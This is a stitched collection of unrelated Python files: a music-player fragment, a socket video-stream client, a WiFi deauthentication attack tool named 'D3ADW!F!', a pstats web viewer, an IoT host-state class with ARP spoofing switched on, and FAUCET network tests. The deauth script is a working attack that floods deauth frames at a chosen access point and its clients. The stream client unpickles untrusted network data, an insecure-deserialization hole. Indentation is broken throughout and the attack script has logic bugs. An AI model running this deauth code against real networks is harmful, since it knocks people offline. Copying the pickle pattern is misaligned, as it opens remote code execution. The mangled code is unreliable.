mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
live_stream_client.py
|
import pickle
import socket
import struct
from threading import Thread
class LiveStreamClient:
    def __init__(self):
        self.client_socket = None
        self.receive_thread = None
        self.image_callbacks = []
        self._running = False

    def connect(self, ip_address: str, port: int):
        self._running = True
        self.receive_thread = Thread(target=self._receive, args=(ip_address, port))
        self.receive_thread.start()

    def stop(self):
        # threading.Thread has no stop(); signal the receive loop to exit and
        # close the socket so a blocking recv() returns.
        self._running = False
        if self.client_socket is not None:
            self.client_socket.close()
def _receive(self, ip_address: str, port: int):
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((ip_address, port))
data = b''
payload_size = struct.calcsize("L")
        while self._running:
while len(data) < payload_size:
data += self.client_socket.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += self.client_socket.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
self._send_frame_callback(frame)
def _send_frame_callback(self, frame):
for callback in self.image_callbacks:
callback(frame)
def register_image_callback(self, callback):
self.image_callbacks.append(callback)
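
# Minimal usage sketch (assumes a compatible server that sends pickled frames
# prefixed with a struct-packed "L" length is already listening; the host and
# port below are placeholders, not part of this module).
if __name__ == "__main__":
    import time

    def print_frame_info(frame):
        # each frame is whatever object the server pickled, e.g. a numpy image array
        print("received frame of type", type(frame).__name__)

    client = LiveStreamClient()
    client.register_image_callback(print_frame_info)
    client.connect("127.0.0.1", 8089)  # placeholder address
    time.sleep(5)
    client.stop()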
|
D3ADW!F!.py
|
#!/usr/bin/python3
import signal
from time import sleep as timeout
from scapy.all import *
from pyfiglet import figlet_format
from scapy.layers.dot11 import Dot11Beacon, Dot11ProbeResp, Dot11, Dot11Deauth, Dot11Elt, Dot11AssoReq, Dot11Auth
from termcolor import colored
from multiprocessing import Process
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import platform
import os
from tqdm import tqdm
from colors import red, green, blue
from time import sleep
def restart_program() :
python = sys.executable
os.execl(python, python, *sys.argv)
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("D3AD WiFi"), color="cyan"))
print('=' * 60)
print("\t\tDeveloped By •ArunAppoos (©) 2020")
print('=' * 60)
print(red("NOTE: Before using this tool, you must enable monitor mode on your wifi adapter."))
option = input("Choose which tool you want to use! \n \t[1] WiFi Deauth Tool \n \t[2] WiFi Deauth Detection Tool \n"
"\nEnter your choice: ")
if option == "1" :
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("W!F! Deauth"), color="blue"))
def add_network(pckt, known_networks) :
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[
Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
channel = int(ord(pckt[Dot11Elt :3].info))
if bssid not in known_networks :
known_networks[bssid] = (essid, channel)
print("{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid))
def channel_scan() :
while True :
try :
channel = random.randrange(1, 13)
os.system("iwconfig %s channel %d" % (interface, channel))
time.sleep(1)
except KeyboardInterrupt :
break
def stop_channel_scan() :
global stop_sniff
stop_sniff = True
channel_scan.terminate()
channel_scan.join()
def keep_sniffing() :
return stop_sniff
def perform_deauth(bssid, client, count) :
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' :
cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print('Sending Deauth to ' + client + ' from ' + bssid)
if not count : print('Press CTRL+C to quit')
while count != 0 :
try :
for i in range(64) :
send(pckt)
if client != 'FF:FF:FF:FF:FF:FF' : send(cli_to_ap_pckt)
count = -1
except KeyboardInterrupt :
break
if __name__ == "__main__" :
interface: str = input("Select the wifi interface(ex.mon0) : ")
conf.iface = interface
networks = {}
stop_sniff = False
print('>>Press Ctrl+c to stop sniffing!<<')
bla = blue("Scanning wifi networks")
for i in tqdm(range(100), desc=bla) :
sleep(0.1)
print('=' * 60 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel', 'ESSID', 'BSSID') + '=' * 60)
channel_scan = Process(target=channel_scan(), args=(interface,))
channel_scan.start()
signal.signal(signal.SIGINT, stop_channel_scan())
sniff(lfilter=lambda x : (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=keep_sniffing,
prn=lambda x : add_network(x, networks))
signal.signal(signal.SIGINT, signal.SIG_DFL)
print('=' * 60)
target_bssid = input('Enter a BSSID to perform deauth attack (q to quit): ')
while target_bssid not in networks :
if target_bssid == 'q' : sys.exit(0)
input('BSSID not found... Please enter a valid BSSID (q to quit): ')
print('Changing ' + interface + ' to channel ' + str(networks[target_bssid][1]))
os.system("iwconfig %s channel %d" % (interface, networks[target_bssid][1]))
target_client = input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client :
target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = input('Number of deauth packets (Default: -1 [constant]): ')
if not deauth_pckt_count :
deauth_pckt_count = -1
perform_deauth(target_bssid, target_client, deauth_pckt_count)
if option == "2" :
a = platform.system()
if a == 'Windows' :
print(os.system('cls'))
elif a == 'Linux' :
print(os.system('clear'))
elif a == 'Darwin' :
print(os.system('clear'))
print(colored(figlet_format("Deauth Detector"), color="blue"))
interface = input("Select the wifi interface(ex.mon0) : ")
def sniffReq(p) :
if p.haslayer(Dot11Deauth) :
print(
p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]"))
if p.haslayer(Dot11AssoReq) :
print(
p.sprintf(
"Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]"))
if p.haslayer(Dot11Auth) :
print(
p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]"))
print(
p.sprintf(
"------------------------------------------------------------------------------------------"))
sniff(iface=interface, prn=sniffReq)
elif option >= '3' :
print("Error! Enter a valid option.")
restart_program()
elif option == '0' :
print("Error! Enter a valid option.")
restart_program()
else :
timeout(3)
restart_program()
|
iprof_app.py
|
# This is a modified version of:
# http://sourceforge.net/p/imvu/code/HEAD/tree/imvu_open_source/tools/pstats_viewer.py
import os
import pstats
import sys
import traceback
import time
import webbrowser
import fnmatch
import threading
from six import StringIO
import tornado.ioloop
import tornado.web
def launch_browser(port):
time.sleep(1)
webbrowser.get().open('http://localhost:%s' % port)
def startThread(fn):
thread = threading.Thread(target=fn)
    thread.daemon = True  # setDaemon() is deprecated; set the daemon attribute directly
thread.start()
return thread
def htmlquote(fn):
    return fn.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
def shrink(s):
if len(s) < 40:
return s
return s[:20] + '...' + s[-20:]
def formatfunc(func):
file, line, func_name = func
return '%s:%s:%s' % (os.path.basename(file), line, htmlquote(shrink(func_name)))
def formatTime(dt):
return '%.2fs' % dt
def formatTimeAndPercent(dt, total):
percent = "(%.1f%%)" % (100.0 * dt / total)
if percent == '(0.0%)':
percent = ''
    return '%s <font color=#808080>%s</font>' % (formatTime(dt), percent)
def wrapTag(tag, body, klass=''):
if klass:
klass = 'class=%s' % klass
return '<%s %s>%s</%s>' % (tag, klass, body, tag)
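# For example (derived from the helpers above):
#   wrapTag('td', '1.23s', klass='even')  ->  '<td class=even>1.23s</td>'
#   formatTime(1.234)                     ->  '1.23s'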
class Application(tornado.web.Application):
def __init__(self, stats, selector):
self.stats = stats
self.stats.stream = StringIO()
self.stats.calc_callees()
self.total_time = self.stats.total_tt
self.filename = self.stats.files[0]
width, self._full_print_list = self.stats.get_print_list(())
if selector is None:
self.width, self.print_list = width, self._full_print_list
else:
self.width, self.print_list = self.stats.get_print_list((selector,))
self.func_to_id = {}
self.id_to_func = {}
for i, func in enumerate(self.print_list):
self.id_to_func[i] = func
self.func_to_id[func] = i
if selector is not None:
for i, func in enumerate(self._full_print_list):
if func not in self.func_to_id:
self.func_to_id[func] = -(i+1)
self.id_to_func[-(i+1)] = func
self.tabstyle = """
table {
font-family:Arial, Helvetica, sans-serif;
color: black;
font-size:14px;
text-shadow: 1px 1px 0px #fff;
background:#eaebec;
margin:10px;
border: black 1px solid;
-moz-border-radius:3px;
-webkit-border-radius:3px;
border-radius:3px;
}
table th {
padding-right: 5px;
padding-left: 5px;
background: #ededed;
}
table td {
border-top: 1px solid #ffffff;
border-bottom:1px solid #e0e0e0;
border-left: 1px solid #e0e0e0;
background: #e6e6e6;
text-align: center;
}
table td:first-child {
text-align: left;
padding-right: 10px;
}
table tr.even td {
background: #f2f2f2;
}
table tr:hover td {
background: #ccffff;
}
"""
handlers = [
(r"/", Index),
(r"/func/([0-9]+)", Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super(Application, self).__init__(handlers, **settings)
def getFunctionLink(self, func):
_, _, func_name = func
title = func_name
fid = self.func_to_id[func]
if fid < 0:
return '<label>%s</label>' % formatfunc(func)
else:
return '<a title="%s" href="/func/%s">%s</a>' % (title, fid, formatfunc(func))
class Index(tornado.web.RequestHandler):
def get(self):
app = self.application
table = []
sort_index = ['cc', 'nc', 'tt', 'ct'].index(self.get_argument('sort', 'ct'))
app.print_list.sort(
key=lambda func: app.stats.stats[func][sort_index],
reverse=True)
for i, func in enumerate(app.print_list):
file, line, func_name = func
primitive_calls, total_calls, exclusive_time, inclusive_time, callers = app.stats.stats[func]
if primitive_calls == 0:
extime = exclusive_time
inctime = inclusive_time
else:
extime = exclusive_time / primitive_calls
inctime = inclusive_time / primitive_calls
if i % 2 == 0:
klass = 'even'
else:
klass = None
row = wrapTag('tr', ''.join(wrapTag('td', cell) for cell in (
app.getFunctionLink(func),
formatTimeAndPercent(exclusive_time, app.total_time),
formatTimeAndPercent(inclusive_time, app.total_time),
primitive_calls,
total_calls,
formatTime(extime),
formatTime(inctime))), klass=klass)
table.append(row)
self.write('''\
<html>
<head>
<style>%s</style>
</head>
<body>
<h1>%s</h1>
<h2>Total time: %s</h2>
<table>
<tr>
<th>file:line:function</th>
<th><a href="?sort=tt">Exclusive time</a></th>
<th><a href="?sort=ct">Inclusive time</a></th>
<th><a href="?sort=cc">Primitive calls</a></th>
<th><a href="?sort=nc">Total calls</a></th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
</body>
</html>
''' % (app.tabstyle, app.filename, formatTime(app.total_time), '\n'.join(table)))
class Function(tornado.web.RequestHandler):
def get(self, func_id):
app = self.application
func_id = int(func_id)
        # Negative ids (functions outside the selector) are stored directly in
        # id_to_func by the Application constructor, so a single lookup suffices.
        func = app.id_to_func[func_id]
f_cc, f_nc, f_tt, f_ct, callers = app.stats.stats[func]
callees = app.stats.all_callees[func]
def sortedByInclusive(items):
sortable = [(ct, (f, (cc, nc, tt, ct))) for f, (cc, nc, tt, ct) in items]
return [y for x, y in reversed(sorted(sortable))]
def buildFunctionTable(items):
callersTable = []
for i, (caller, (cc, nc, tt, ct)) in enumerate(sortedByInclusive(items)):
if i % 2 == 0:
klass = 'even'
else:
klass = None
callersTable.append(wrapTag('tr', ''.join(wrapTag('td', cell)
for cell in (
app.getFunctionLink(caller),
formatTimeAndPercent(tt, app.total_time),
formatTimeAndPercent(ct, app.total_time),
cc,
nc,
formatTime(tt / cc),
formatTime(ct / cc))), klass=klass))
return '\n'.join(callersTable)
caller_stats = [(c, app.stats.stats[c][:4]) for c in callers]
callersTable = buildFunctionTable(caller_stats)
calleesTable = buildFunctionTable(callees.items())
self.write('''\
<html>
<head>
<style>%s</style>
</head>
<body>
<a href="/">Home</a>
<h1>%s</h1>
<table>
<tr><th align="left">Primitive Calls</th><td>%s</td></tr>
<tr><th align="left">Total calls</th><td>%s</td></tr>
<tr><th align="left">Exclusive time</th><td>%s</td></tr>
<tr><th align="left">Inclusive time</th><td>%s</td></tr>
</table>
<h2>Callers</h2>
<table>
<tr>
<th>Function</th>
<th>Exclusive time</th>
<th>Inclusive time</th>
<th>Primitive calls</th>
<th>Total calls</th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
<h2>Callees</h2>
<table>
<tr>
<th>Function</th>
<th>Exclusive time</th>
<th>Inclusive time</th>
<th>Primitive calls</th>
<th>Total calls</th>
<th>Exclusive per call</th>
<th>Inclusive per call</th>
</tr>
%s
</table>
</body>
</html>
''' % (app.tabstyle, formatfunc(func), f_cc, f_nc, f_tt, f_ct,
callersTable, calleesTable))
def view_pstats(prof_pattern, selector=None, port=8009):
"""
Start an interactive web viewer for profiling data.
Parameters
----------
prof_pattern: str
Name of profile data file or glob pattern.
selector : str, optional
        Portion of filename used to select functions.
port: int
Port number used by web server.
"""
prof_files = sorted(fnmatch.filter(os.listdir('.'), prof_pattern))
if prof_files:
stats = pstats.Stats(prof_files[0])
for pfile in prof_files[1:]:
stats.add(pfile)
app = Application(stats, selector)
app.listen(port)
print("starting server on port %d" % port)
serve_thread = startThread(tornado.ioloop.IOLoop.current().start)
launch_thread = startThread(lambda: launch_browser(port))
        while serve_thread.is_alive():  # Thread.isAlive() was removed in Python 3.9
serve_thread.join(timeout=1)
def cmd_view_pstats(args=None):
"""
Allows calling of view_pstats from a console script.
"""
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--port', action='store', dest='port',
default=8009, type=int,
help='port used for web server')
parser.add_argument('--filter', action='store', dest='filter',
default=None,
help='portion of filename used to filter displayed functions.')
parser.add_argument('file', metavar='file', nargs=1,
help='profile file to view.')
options = parser.parse_args(args)
view_pstats(options.file[0], port=options.port, selector=options.filter)
if __name__ == '__main__':
cmd_view_pstats()
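
# Example invocation (a sketch; the profile file name, filter, and port below are
# illustrative values, not taken from this module):
#
#   python iprof_app.py --port 8009 --filter mymodule 'prof.out*'
#
# or, equivalently, from Python:
#
#   view_pstats('prof.out*', selector='mymodule', port=8009)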
|
host_state.py
|
"""
Global shared state about the host.
"""
import threading
import utils
import time
CLIENT_VERSION = '1.0.3-L'
class HostState(object):
def __init__(self):
self.host_ip = None
self.host_mac = None
self.gateway_ip = None
self.packet_processor = None
self.user_key = None
self.secret_salt = None
self.client_version = CLIENT_VERSION
self.persistent_mode = True # Always persistent to remove local Flask
# The following objects might be modified concurrently.
self.lock = threading.Lock()
self.ip_mac_dict = {} # IP -> MAC
self.pending_dhcp_dict = {} # device_id -> hostname
self.dhcp_dict = {}
self.pending_resolver_dict = {} # device_id -> resolver_ip
self.pending_dns_dict = {} # (device_id, domain) -> ip_set
self.pending_flow_dict = {} # flow_key -> flow_stats
self.pending_ua_dict = {} # device_id -> ua_set
self.pending_tls_dict_list = [] # List of tls_dict
self.pending_netdisco_dict = {} # device_id -> device_info_list
self.pending_syn_scan_dict = {} # device_id -> port_list
self.status_text = None
self.device_whitelist = []
self.has_consent = True
self.byte_count = 0
self.is_inspecting_traffic = True
self.fast_arp_scan = True # Persists for first 5 mins
self.last_ui_contact_ts = time.time() # ts of /is_inspecting_traffic
self.quit = False
self.spoof_arp = True
self.block_device_dict = {} # device_id -> (start_unix_ts, stop_unix_ts)
self.last_get_traffic_ts = time.time() # Timestamp when /get_traffic was called
# Constantly checks for IP changes on this host
thread = threading.Thread(target=self.update_ip_thread)
thread.daemon = True
thread.start()
def set_ip_mac_mapping(self, ip, mac):
with self.lock:
self.ip_mac_dict[ip] = mac
def get_ip_mac_dict_copy(self):
with self.lock:
return dict(self.ip_mac_dict)
def is_inspecting(self):
with self.lock:
return self.is_inspecting_traffic
def update_ip_thread(self):
prev_gateway_ip = None
prev_host_ip = None
while True:
try:
self.gateway_ip, _, self.host_ip = utils.get_default_route()
except Exception:
pass
# Upon network changes, clear ARP cache.
if self.gateway_ip != prev_gateway_ip or \
self.host_ip != prev_host_ip:
with self.lock:
self.ip_mac_dict = {}
prev_gateway_ip = self.gateway_ip
prev_host_ip = self.host_ip
time.sleep(15)
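
# Minimal usage sketch (illustrative only; assumes utils.get_default_route() is
# available as imported above, and the IP/MAC values are made up):
#
#   state = HostState()
#   state.set_ip_mac_mapping('192.168.1.10', 'aa:bb:cc:dd:ee:ff')
#   with state.lock:                      # guard any other shared fields the same way
#       state.byte_count += 1500
#   snapshot = state.get_ip_mac_dict_copy()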
|
mininet_tests.py
|
#!/usr/bin/env python3
"""Mininet tests for FAUCET."""
# pylint: disable=too-many-lines
# pylint: disable=missing-class-docstring,missing-function-docstring
# pylint: disable=too-many-arguments
import binascii
import collections
import copy
import itertools
import ipaddress
import json
import os
import random
import re
import shutil
import socket
import threading
import time
import unittest
from http.server import SimpleHTTPRequestHandler
from http.server import HTTPServer
import scapy.all
import yaml # pytype: disable=pyi-error
from mininet.log import error
from mininet.util import pmonitor
from clib import mininet_test_base
from clib import mininet_test_util
from clib.mininet_test_base import PEER_BGP_AS, IPV4_ETH, IPV6_ETH
MIN_MBPS = 100
CONFIG_BOILER_UNTAGGED = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
CONFIG_TAGGED_BOILER = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_2)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_3)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
%(port_4)d:
tagged_vlans: [100]
count_untag_vlan_miss: true
"""
class QuietHTTPServer(HTTPServer):
allow_reuse_address = True
timeout = None
@staticmethod
def handle_error(_request, _client_address):
return
class PostHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args): # pylint: disable=redefined-builtin
return
def _log_post(self):
content_len = int(self.headers.get('content-length', 0))
content = self.rfile.read(content_len).decode().strip()
if content and hasattr(self.server, 'influx_log'):
with open(self.server.influx_log, 'a') as influx_log:
influx_log.write(content + '\n')
class InfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
return self.send_response(204)
class SlowInfluxPostHandler(PostHandler):
def do_POST(self): # pylint: disable=invalid-name
self._log_post()
time.sleep(self.server.timeout * 3)
return self.send_response(500)
class FaucetTest(mininet_test_base.FaucetTestBase):
pass
class FaucetUntaggedTest(FaucetTest):
"""Basic untagged VLAN test."""
HOST_NAMESPACE = {}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
EVENT_SOCK_HEARTBEAT = '5'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
# pylint: disable=invalid-name
CONFIG = CONFIG_BOILER_UNTAGGED
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
def verify_events_log(self, event_log, timeout=10):
required_events = {'CONFIG_CHANGE', 'PORT_CHANGE', 'L2_LEARN', 'PORTS_STATUS', 'EVENT_SOCK_HEARTBEAT'}
for _ in range(timeout):
prom_event_id = self.scrape_prometheus_var('faucet_event_id', dpid=False)
event_id = None
with open(event_log, 'r') as event_log_file:
for event_log_line in event_log_file.readlines():
event = json.loads(event_log_line.strip())
event_id = event['event_id']
required_events -= set(event.keys())
if prom_event_id == event_id:
return
time.sleep(1)
self.assertEqual(prom_event_id, event_id)
self.assertFalse(required_events)
def test_untagged(self):
"""All hosts on the same untagged VLAN should have connectivity."""
self._enable_event_log()
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.verify_traveling_dhcp_mac()
self.gauge_smoke_test()
self.prometheus_smoke_test()
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_events_log(self.event_log)
class Faucet8021XBase(FaucetTest):
NUM_FAUCET_CONTROLLERS = 1
NUM_GAUGE_CONTROLLERS = 1
HOST_NAMESPACE = {3: False}
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
RADIUS_PORT = None
DOT1X_EXPECTED_EVENTS = []
SESSION_TIMEOUT = 3600
LOG_LEVEL = 'DEBUG'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
dot1x:
nfv_intf: NFV_INTF
nfv_sw_port: %(port_4)d
radius_ip: 127.0.0.1
radius_port: RADIUS_PORT
radius_secret: SECRET
interfaces:
%(port_1)d:
native_vlan: 100
# 802.1x client.
dot1x: True
%(port_2)d:
native_vlan: 100
# 802.1X client.
dot1x: True
%(port_3)d:
native_vlan: 100
# ping host.
%(port_4)d:
output_only: True
# "NFV host - interface used by controller."
"""
wpasupplicant_conf_1 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="user"
password="microphone"
}
"""
wpasupplicant_conf_2 = """
ap_scan=0
network={
key_mgmt=IEEE8021X
eap=MD5
identity="admin"
password="megaphone"
}
"""
freeradius_user_conf = """user Cleartext-Password := "microphone"
Session-timeout = {0}
admin Cleartext-Password := "megaphone"
Session-timeout = {0}
vlanuser1001 Cleartext-Password := "password"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan1"
vlanuser2222 Cleartext-Password := "milliphone"
Tunnel-Type = "VLAN",
Tunnel-Medium-Type = "IEEE-802",
Tunnel-Private-Group-id = "radiusassignedvlan2"
filter_id_user_accept Cleartext-Password := "accept_pass"
Filter-Id = "accept_acl"
filter_id_user_deny Cleartext-Password := "deny_pass"
Filter-Id = "deny_acl"
"""
eapol1_host = None
eapol2_host = None
ping_host = None
nfv_host = None
nfv_intf = None
nfv_portno = None
@staticmethod
def _priv_mac(host_id):
two_byte_port_num = '%04x' % host_id
two_byte_port_num_formatted = ':'.join((two_byte_port_num[:2], two_byte_port_num[2:]))
return '00:00:00:00:%s' % two_byte_port_num_formatted
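    # For example, _priv_mac(1) returns '00:00:00:00:00:01' (the low 16 bits of
    # the host/port id become the last two MAC octets).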
def pre_start_net(self):
self.eapol1_host, self.eapol2_host, self.ping_host, self.nfv_host = self.hosts_name_ordered()
switch = self.first_switch()
last_host_switch_link = switch.connectionsTo(self.nfv_host)[0]
nfv_intf = [
intf for intf in last_host_switch_link if intf in switch.intfList()][0]
self.nfv_intf = str(nfv_intf)
nfv_intf = self.nfv_host.intf()
self.RADIUS_PORT = mininet_test_util.find_free_udp_port(self.ports_sock, self._test_name())
self.CONFIG = self.CONFIG.replace('NFV_INTF', str(nfv_intf))
self.CONFIG = self.CONFIG.replace('RADIUS_PORT', str(self.RADIUS_PORT))
super()._init_faucet_config()
def setUp(self):
super().setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid,
host_namespace=self.HOST_NAMESPACE)
self.start_net()
self.nfv_portno = self.port_map['port_4']
self.host_drop_all_ips(self.nfv_host)
self.nfv_pids = []
tcpdump_args = '-e -n -U'
self.eapol1_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -w %s/%s-start.pcap %s ether proto 0x888e &' % (
self.tmpdir, self.eapol1_host.name, tcpdump_args), 300))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i %s-eth0 -w %s/eap-lo.pcap %s ether proto 0x888e &' % (
self.nfv_host.name, self.tmpdir, tcpdump_args), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.nfv_host.cmd(
mininet_test_util.timeout_cmd(
'tcpdump -i lo -w %s/radius.pcap %s udp port %d &' % (
self.tmpdir, tcpdump_args, self.RADIUS_PORT), 300))
self.nfv_pids.append(int(self.nfv_host.lastPid))
self.radius_log_path = self.start_freeradius()
self.nfv_pids.append(int(self.nfv_host.lastPid))
self._enable_event_log(300)
def tearDown(self, ignore_oferrors=False):
for pid in self.nfv_pids:
self.nfv_host.cmd('kill %u' % pid)
super().tearDown(ignore_oferrors=ignore_oferrors)
def post_test_checks(self):
self.assertGreater(os.path.getsize(self.event_log), 0)
self.verify_dot1x_events_log()
def verify_dot1x_events_log(self):
def replace_mac(host_no):
replacement_macs = {
'HOST1_MAC': self.eapol1_host.MAC(),
'HOST2_MAC': self.eapol2_host.MAC(),
'HOST3_MAC': self.ping_host.MAC(),
'HOST4_MAC': self.nfv_host.MAC(),
}
return replacement_macs.get(host_no, None)
def insert_dynamic_values(dot1x_expected_events):
for dot1x_event in dot1x_expected_events:
top_level_key = list(dot1x_event.keys())[0]
dot1x_params = {'dp_id': int(self.dpid)}
for key, val in dot1x_event[top_level_key].items():
if key == 'port':
dot1x_params[key] = self.port_map[val]
elif key == 'eth_src':
dot1x_params[key] = replace_mac(val)
dot1x_event[top_level_key].update(dot1x_params)
if not self.DOT1X_EXPECTED_EVENTS:
return
dot1x_expected_events = copy.deepcopy(self.DOT1X_EXPECTED_EVENTS)
insert_dynamic_values(dot1x_expected_events)
with open(self.event_log, 'r') as event_file:
events_that_happened = []
for event_log_line in event_file.readlines():
if 'DOT1X' not in event_log_line:
continue
event = json.loads(event_log_line.strip())
events_that_happened.append(event['DOT1X'])
for expected_event in dot1x_expected_events:
self.assertTrue(expected_event in events_that_happened,
msg='expected event: {} not in events_that_happened {}'.format(
expected_event, events_that_happened))
@staticmethod
def _eapol_filter(fields):
return '(' + ' and '.join(('ether proto 0x888e',) + fields) + ')'
def _success_eapol_filter(self, expect_success):
eap_code = '0x04'
if expect_success:
eap_code = '0x03'
return self._eapol_filter(('ether[14:4] == 0x01000004', 'ether[18] == %s' % eap_code))
def _logoff_eapol_filter(self):
return self._eapol_filter(('ether[14:4] == 0x01020000',))
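    # For example, _success_eapol_filter(True) expands to:
    #   (ether proto 0x888e and ether[14:4] == 0x01000004 and ether[18] == 0x03)
    # and _logoff_eapol_filter() to:
    #   (ether proto 0x888e and ether[14:4] == 0x01020000)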
def try_8021x(self, host, port_num, conf, and_logoff=False, terminate_wpasupplicant=False,
wpasup_timeout=180, tcpdump_timeout=30, expect_success=True):
if expect_success:
self.wait_8021x_flows(port_num)
port_labels = self.port_labels(port_num)
success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
tcpdump_filters = [self._success_eapol_filter(expect_success)]
if and_logoff:
tcpdump_filters.append(self._logoff_eapol_filter())
tcpdump_packets = len(tcpdump_filters)
tcpdump_filter = ' or '.join(tcpdump_filters)
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [
lambda: self.wpa_supplicant_callback(
host, port_num, conf, and_logoff,
timeout=wpasup_timeout,
terminate_wpasupplicant=terminate_wpasupplicant)],
timeout=tcpdump_timeout, vflags='-vvv', packets=tcpdump_packets)
if expect_success:
self.wait_for_eap_success(host, self.get_wpa_ctrl_path(host))
if not and_logoff:
self.wait_8021x_success_flows(host, port_num)
success = 'Success' in tcpdump_txt
if expect_success != success:
return False
new_success_total = self.scrape_prometheus_var(
'port_dot1x_success_total', labels=port_labels, default=0)
new_failure_total = self.scrape_prometheus_var(
'port_dot1x_failure_total', labels=port_labels, default=0)
new_logoff_total = self.scrape_prometheus_var(
'port_dot1x_logoff_total', labels=port_labels, default=0)
new_dp_success_total = self.scrape_prometheus_var(
'dp_dot1x_success_total', default=0)
new_dp_failure_total = self.scrape_prometheus_var(
'dp_dot1x_failure_total', default=0)
new_dp_logoff_total = self.scrape_prometheus_var(
'dp_dot1x_logoff_total', default=0)
if expect_success and success:
self.assertGreater(new_success_total, success_total)
self.assertGreater(new_dp_success_total, dp_success_total)
self.assertEqual(failure_total, new_failure_total)
self.assertEqual(dp_failure_total, new_dp_failure_total)
logoff = 'logoff' in tcpdump_txt
if logoff != and_logoff:
return False
if and_logoff:
self.assertGreater(new_logoff_total, logoff_total)
return True
self.assertEqual(logoff_total, new_logoff_total)
self.assertEqual(dp_logoff_total, new_dp_logoff_total)
self.assertEqual(dp_success_total, new_dp_success_total)
self.assertGreaterEqual(new_failure_total, failure_total)
self.assertGreaterEqual(new_dp_failure_total, dp_failure_total)
return False
def retry_8021x(self, host, port_num, conf, and_logoff=False, retries=2, expect_success=True):
for _ in range(retries):
if self.try_8021x(host, port_num, conf, and_logoff, expect_success=expect_success):
return True
time.sleep(1)
return False
def wait_8021x_flows(self, port_no):
port_actions = [
'SET_FIELD: {eth_dst:%s}' % self._priv_mac(port_no), 'OUTPUT:%u' % self.nfv_portno]
